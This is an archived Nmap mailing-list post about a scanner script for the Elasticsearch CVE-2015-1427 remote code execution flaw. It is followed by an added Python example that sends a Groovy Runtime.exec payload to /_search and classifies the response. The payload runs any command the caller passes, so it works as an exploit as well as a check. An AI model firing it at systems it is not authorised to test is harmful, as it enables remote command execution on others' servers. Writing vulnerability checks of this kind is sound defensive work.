Nmap Development mailing list archives

[NSE] http-vuln-cve2015-1427 Remote Code Execution in Elastic Search


From: Gyanendra Mishra <anomaly.the () gmail com>
Date: Thu, 12 Mar 2015 17:22:30 +0530

Hi,

I tried writing a script inspired by [1] and [2]. ElasticSearch versions
1.3.0 to 1.3.8 and 1.4.0 to 1.4.3 have a remote code execution
vulnerability as described in [1]. The script sends a simple POST request
containing the payload as mentioned in [3], [2]. If the hits table inside
the hits table contains something, then the script was successful and the
target is vulnerable. I tried running the curl command in [1] and [3] and
the script by XiphosResearch in [2] on various versions of ElasticSearch
(1.3.6, 1.3.7, 1.3.0, 1.4.2), but I couldn't get the desired results. The
attached NSE script gets results exactly as the above-mentioned
commands/script. So I couldn't run any successful tests. I have also added
a GitHub link [4] to my script in case I make any changes to it.

[1]
jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
[2]
https://github.com/XiphosResearch/exploits/blob/master/ElasticSearch/elastic_shell.py
[3]
carnal0wnage.attackresearch.com/2015/03/elasticsearch-cve-2015-1427-rce-exploit.html
[4]
https://github.com/h4ck3rk3y/nmap/blob/master/test_scripts/http-vuln-cve2015-1427.nse

Gyanendra

Attachment: http-vuln-cve2015-1427.nse
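Editor's note: the following is an added example, not the attached NSE script and not code from any of the cited posts. It shows, in Python rather than Lua, the request/response logic the post describes: POST a Groovy `script_fields` query to `/_search` and treat a non-empty `hits.hits` carrying the script field as proof of code execution. The Groovy one-liner is the form used by the public proof-of-concepts the post cites in [1] to [3]; the field name `lupin`, the `classify` and `check_host` helpers and the three sample responses are this example's own constructed inputs. One caveat worth checking before concluding a host is not vulnerable: `script_fields` are evaluated once per matched document, so a cluster with no documents returns an empty `hits.hits` even when scripting is wide open, and the example reports that case separately instead of folding it into "not vulnerable".

```python
"""Offline-testable request builder and response classifier for a
CVE-2015-1427 check (Groovy script_fields on /_search).

Added example; not the NSE script attached to the post.  All sample
responses below are constructed by hand to look like Elasticsearch 1.x
replies; they are not captured from a real host."""
import json
import urllib.error
import urllib.request

FIELD = "lupin"  # name given to the script field; any name works


def build_body(command="id"):
    """Build the _search request body.

    "lang" is set explicitly so the check does not depend on the
    server's default scripting language.  "size": 1 is enough: one hit
    carrying the script field is all the classifier needs.
    """
    script = ('java.lang.Math.class.forName("java.lang.Runtime")'
              '.getRuntime().exec("%s").getText()' % command)
    return {
        "size": 1,
        "query": {"match_all": {}},
        "script_fields": {FIELD: {"lang": "groovy", "script": script}},
    }


def classify(response):
    """Map a _search response to (verdict, detail).

    verdict is one of:
      "vulnerable"     - hits.hits[0].fields[FIELD] holds script output
      "no-documents"   - hits.hits is empty; script_fields never ran
      "not-vulnerable" - a hit came back without the script field
      "error"          - the server returned an error object
    """
    if isinstance(response, (bytes, str)):
        response = json.loads(response)
    if "error" in response:
        return "error", str(response["error"])
    hits = response.get("hits", {}).get("hits", [])
    if not hits:
        return "no-documents", None
    values = hits[0].get("fields", {}).get(FIELD)
    if not values:
        return "not-vulnerable", None
    # ES 1.x returns script fields as single-element arrays.
    return "vulnerable", values[0]


def check_host(base_url, command="id", timeout=10):
    """POST the query to <base_url>/_search and classify the reply.

    Error responses (HTTP 4xx/5xx) still carry a JSON body in 1.x, so
    they are read and classified rather than discarded.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + "/_search",
        data=json.dumps(build_body(command)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.read())
    except urllib.error.HTTPError as err:
        return classify(err.read())


# Constructed sample responses (not captured from a live server).
VULNERABLE_RESPONSE = json.dumps({
    "took": 3, "timed_out": False,
    "hits": {"total": 1, "max_score": 1.0, "hits": [{
        "_index": "website", "_type": "blog", "_id": "1", "_score": 1.0,
        "fields": {FIELD: ["uid=1000(elasticsearch) gid=1000(elasticsearch)\n"]},
    }]},
})
EMPTY_RESPONSE = {"took": 1, "timed_out": False,
                  "hits": {"total": 0, "max_score": None, "hits": []}}
PATCHED_RESPONSE = {"error": "SearchPhaseExecutionException[Failed to execute "
                             "phase [query]]; dynamic scripting for [groovy] "
                             "disabled", "status": 400}

if __name__ == "__main__":
    for name, sample in (("vulnerable", VULNERABLE_RESPONSE),
                         ("empty index", EMPTY_RESPONSE),
                         ("patched", PATCHED_RESPONSE)):
        print("%-12s -> %s" % (name, classify(sample)))
```

To run it against a host, call `check_host("http://target:9200")` on an index that is known to contain at least one document; a `"no-documents"` verdict says nothing about the patch level and calls for re-running against a populated index.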

_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/